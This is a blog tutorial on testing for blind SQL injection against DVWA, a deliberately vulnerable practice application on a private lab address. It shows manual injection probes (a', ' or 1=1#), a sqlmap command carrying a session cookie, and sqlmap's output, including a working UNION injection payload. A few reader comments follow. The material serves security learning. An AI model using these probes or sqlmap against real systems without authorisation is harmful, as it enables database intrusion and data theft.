Test blind sql injection

Blind SQL injection
A web application that is vulnerable to SQL injection may display SQL error that looks like this:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1. This error provide information that this web application is vulnerable to injection and the hacker knows that the DBMS is MySQL.

A web application that does not show the SQL error message when an injection was attempted is known as Blind SQL injection.
Reference: OWASP – Blind SQL injection.

Manual testing

A manual test is attempted by typing an incomplete syntax example putting a' and press submit. As can be seen, there’s no SQL syntax error displayed on the webapp, it is difficult to know if the webapp is susceptible to SQLi unless further test is done by using a complete query.


Testing with a valid query, like this ' or 1=1#, because 1=1 is always true the query displayed as below:

Automated injection example SQLmap

Use burpsuite to intercept the HTTP packet this is to find out what is the cookie, alternatively you can use tamper data to do it. After you have got the cookie value, you can use sqlmap to test for injection such as like this:

/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"

Set up burpsuite, basically this is the default.

Use burpsuite proxy on firefox or other web browser of your choice.

type anything in the box and click submit, burpsuite will have alert:

You will need the cookie to complete the test with sqlmap

The results are these:


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:23:43

[23:23:44] [INFO] testing connection to the target url
[23:23:44] [INFO] testing if the url is stable, wait a few seconds
[23:23:45] [INFO] url is stable
[23:23:45] [INFO] testing if GET parameter 'id' is dynamic
[23:23:46] [WARNING] GET parameter 'id' appears to be not dynamic
[23:23:46] [WARNING] reflective value(s) found and filtering out
[23:23:46] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[23:23:46] [INFO] testing for SQL injection on GET parameter 'id'
[23:23:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:23:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:23:48] [INFO] testing 'Oracle AND time-based blind'
[23:23:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:23:49] [INFO] target url appears to be UNION injectable with 2 columns
[23:23:49] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 120 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=a' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686b633a,0x61484d4c475865765959,0x3a757a643a)#&Submit=Submit
---

[23:23:55] [INFO] testing MySQL
[23:23:55] [INFO] confirming MySQL
[23:23:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[23:23:55] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/172.16.0.4'

[*] shutting down at 23:23:55

root@bt:/pentest/database/sqlmap# 

Advertisements
This entry was posted in Security, Vulnerability Assessment and Pentest and tagged , , , , , , . Bookmark the permalink.

2 Responses to Test blind sql injection

  1. K3170Makan says:

    Good post 😉

    There are much faster ways of extracting data via blind injection, as it stands with MySQL DBs you should be able to extract one character in about 7 requests per character—if you are extracting chars in [a-zA-Z] you should be able to extract them in only 6 requests per char—

    For more check out my blog post on blind MySQL injection —> http://k3170makan.blogspot.com/2012/01/bit-shifting-blind-injection-simplified.html

  2. cyruslab says:

    Hi K3170Makan! Thanks for visiting! I have read your article about bit shifting…but I do not not quite get it…I browse your blog a bit and found you have extensive post about google dorking which is sooo useful and interesting…:D I would like to add your blog to my blogroll 😀

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s